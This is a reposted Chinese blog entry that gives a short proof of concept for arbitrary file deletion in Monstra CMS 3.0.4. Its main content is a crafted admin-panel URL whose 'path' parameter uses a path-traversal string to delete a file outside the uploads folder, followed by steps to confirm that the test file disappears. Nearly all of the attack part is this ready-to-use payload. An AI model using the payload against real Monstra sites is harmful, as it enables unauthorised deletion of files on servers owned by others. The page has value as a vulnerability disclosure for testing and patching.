码迷,mamicode.com
首页 > 其他好文 > 详细

monstra 3.0.4 任意文件删除

时间:2018-09-11 23:50:53      阅读:216      评论:0      收藏:0      [点我收藏+]

标签:rabl   mon   分享图片   文件   let   ref   term   pat   ons   

monstra 3.0.4 任意文件删除

Vulnerable URL:http://127.0.0.1/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

touch 1.txt in /var/www/html/monstra-3.0.4/

visit url:http://172.16.173.238/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db814ea505d80a

the 1.txt will delete

技术分享图片

monstra 3.0.4 任意文件删除

标签:rabl   mon   分享图片   文件   let   ref   term   pat   ons   

原文地址:http://blog.51cto.com/13770310/2173956

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!